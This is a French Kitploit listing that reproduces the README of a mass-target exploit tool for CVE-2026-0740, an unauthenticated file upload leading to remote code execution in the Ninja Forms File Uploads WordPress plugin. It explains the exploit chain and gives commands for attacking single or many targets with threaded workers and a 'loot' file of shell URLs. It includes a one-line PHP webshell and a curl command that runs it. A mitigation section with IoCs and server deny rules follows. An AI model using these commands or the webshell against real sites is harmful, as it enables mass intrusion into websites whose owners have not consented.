Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-0740-mass — Preuve de concept pour CVE-2026-0740 : Ninja Forms File Uploads <= 3.3.26 — Téléchargement arbitraire de fichiers non authentifié pouvant conduire à une exécution de code à distance (RCE). | Kitploit
Outils/GitHubGitHub/exdev994/cve-2026-0740-mass
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubexdev994/cve-2026-0740-mass

CVE-2026-0740-mass

Preuve de concept pour CVE-2026-0740 : Ninja Forms File Uploads <= 3.3.26 — Téléchargement arbitraire de fichiers non authentifié pouvant conduire à une exécution de code à distance (RCE).

Voir le dépôt
11il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-0740 — Mass-Target Exploit Engine

Author: 0xNuts
Contributor: Cursor
Repository: https://github.com/ExDev994/CVE-2026-0740-mass

PoC pour CVE-2026-0740: Ninja Forms File Uploads <= 3.3.26 — Téléversement arbitraire de fichiers non authentifié pouvant mener à une RCE.

La vulnérabilité initiale a été découverte par Sélim Lanouar (@whattheslime). Le moteur d'exploitation de cibles massives a été développé par 0xNuts avec la contribution de Cursor.


Avertissement

Ce dépôt est fourni uniquement à des fins de recherche en sécurité et défensives (tests de pénétration autorisés, red team avec autorisation écrite, validation de correctifs et durcissement).

  • Ne l'utilisez pas contre des systèmes sans autorisation explicite du propriétaire.
  • Les auteurs ne sont pas responsables de l'abus de ces informations.

Résumé de la vulnérabilité

Le plugin Ninja Forms - File Uploads pour WordPress est vulnérable à un téléversement arbitraire de fichiers non authentifié dans toutes les versions jusqu'à 3.3.26 (inclus).

Chaîne d'exploitation :

  1. Un attaquant non authentifié obtient un nonce de téléversement via l'action AJAX nf_fu_get_new_nonce avec un field_id arbitraire.
  2. Le gestionnaire nf_fu_upload valide l'extension du fichier téléversé (ex. image.jpg), mais l'attaquant peut remplacer le nom du fichier de destination via le paramètre POST (image_jpg).
  3. Le nom du fichier de destination est passé à move_uploaded_file() sans assainissement adéquat → extension arbitraire + traversée de chemin (../).

Un correctif complet est disponible dans la version 3.3.27+.


Prérequis

  • Python 3.10+
  • La cible doit avoir les plugins Ninja Forms et Ninja Forms - File Uploads (<= 3.3.26) installés et activés.
  • Aucun formulaire ou champ de téléversement préexistant n'est nécessaire.

Installation des dépendances

Ce dépôt contient uniquement CVE-2026-0740.py et README.md. Installez les dépendances manuellement :

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate          # Linux/macOS/WSL
# .venv\Scripts\activate           # Windows

pip install httpx==0.28.1 socksio==1.0.0

Utilisation

Aide en ligne de commande

root@kitploit:~
python3 CVE-2026-0740.py -h

Options des arguments

Remarque : Vous devez utiliser exactement un de -t ou -f.


Mode cible unique

root@kitploit:~
python3 CVE-2026-0740.py -t http://cible.com --shell shell.php

Avec traversée de chemin explicite :

root@kitploit:~
python3 CVE-2026-0740.py -t http://cible.com --shell shell.php -d ../../../shell.php

Mode cibles multiples

Créez un fichier cibles.txt :

root@kitploit:~
http://site1.com
https://site2.com
10.0.0.5
# les lignes de commentaire sont ignorées

Exécutez :

root@kitploit:~
python3 CVE-2026-0740.py -f cibles.txt --shell shell.php

Avec réglage des workers et fichier de butin :

root@kitploit:~
python3 CVE-2026-0740.py -f cibles.txt --shell shell.php -w 50 -o butin.txt

L'URL du shell téléversé avec succès sera écrite dans le fichier de butin (mode ajout).


Exemple de webshell minimal

root@kitploit:~
echo '<?php system($_GET["cmd"] ?? ""); ?>' > shell.php

Après un téléversement réussi, le script affiche l'URL du shell. Vérifiez (uniquement sur des cibles de laboratoire/autorisées) :

root@kitploit:~
curl "http://cible.com/wp-content/shell.php?cmd=id"

Détection de la version du plugin (optionnel)

root@kitploit:~
httpx -fr -u http://cible.com -ms 'file_uploads_nfpluginsettings-js' -er 'nfpluginsettings\.js\?ver=[\d\.]+'

Correction (Atténuation)

1. Mettre à jour le plugin (priorité absolue)

Mettez à jour Ninja Forms - File Uploads vers la version 3.3.27 ou ultérieure immédiatement.

  • Administrateur WordPress → Plugins → vérifiez la version de Ninja Forms - File Uploads
  • Si la mise à jour automatique n'est pas disponible, téléchargez la version corrigée depuis le fournisseur officiel.

2. Vérification du correctif

Après la mise à jour :

  • Assurez-vous que la version du plugin est >= 3.3.27
  • Testez le point de terminaison wp-admin/admin-ajax.php avec les actions nf_fu_get_new_nonce / nf_fu_upload — le téléversement arbitraire doit être refusé.
  • Scannez à nouveau avec un scanner (modèle Nuclei CVE-2026-0740) pour confirmation.

3. Indicateurs de compromission (IoC)

Vérifiez les répertoires de téléversement WordPress :

root@kitploit:~
wp-content/uploads/ninja-forms/tmp/
wp-content/uploads/ninja-forms/
wp-content/

Recherchez les fichiers étrangers : .php, .pht, .phtml, .phar, .html, .svg, .js qui ne devraient pas être présents.

Vérifiez également les logs du serveur web pour les requêtes vers :

root@kitploit:~
/wp-admin/admin-ajax.php

avec les paramètres action=nf_fu_get_new_nonce ou action=nf_fu_upload.

4. Durcissement supplémentaire

  • WAF / limitation de débit sur /wp-admin/admin-ajax.php pour bloquer les abus de téléversement massif.

  • Désactiver l'exécution PHP dans le répertoire wp-content/uploads/ via la configuration du serveur web :

    Apache (.htaccess dans uploads/) :

    root@kitploit:~
    <FilesMatch "\.php$">
      Require all denied
    </FilesMatch>
    

    Nginx :

    root@kitploit:~
    location ~* /wp-content/uploads/.*\.php$ {
        deny all;
    }
    
  • Moindre privilège : assurez-vous que les permissions des fichiers téléversés ne sont pas accessibles en écriture par le serveur web en dehors du répertoire nécessaire.

  • Surveillance : alertez sur les POST vers admin-ajax.php avec l'action nf_fu_* depuis des IP étrangères ou un volume élevé.

  • Sauvegarde et réponse aux incidents : si des IoC sont trouvés, isolez le site, faites pivoter les identifiants de la base de données et de l'administrateur, auditez les autres plugins/thèmes.

5. Si le plugin n'est pas utilisé

Désactivez et supprimez le plugin Ninja Forms - File Uploads si la fonctionnalité de téléversement n'est pas nécessaire.


Références

  • CVE-2026-0740
  • Lexfo — Technical Deep Dive
  • Wordfence — 50,000 WordPress Sites Affected
  • GHSA-v8wq-rjpf-669f
  • Nuclei Template
Télécharger l’outil
Vecteur / Extension<= 3.3.243.3.253.3.263.3.27
Path traversal (../)PASS---
.phpPASS---
.phtml, .pharPASSPASS--
.phtPASSPASSPASS-
.html, .svg, .jsPASSPASSPASS-
FlagFonction
-t, --targetCible unique (URL unique)
-f, --targets-fileFichier .txt contenant la liste des cibles (une URL par ligne)
--shellFichier de payload/webshell à téléverser (obligatoire)
-d, --destTraversée de chemin de destination (par défaut : ../../../)
-w, --workersNombre de threads concurrents (par défaut : 20)
-o, --outputFichier de butin pour les URL de shell réussis (par défaut : results.txt)
-x, --proxyProxy HTTP (ex. http://127.0.0.1:8080)
-H, --headersEn-têtes personnalisés (format : 'Header: Value')
--timeoutTimeout HTTP en secondes (par défaut : 10)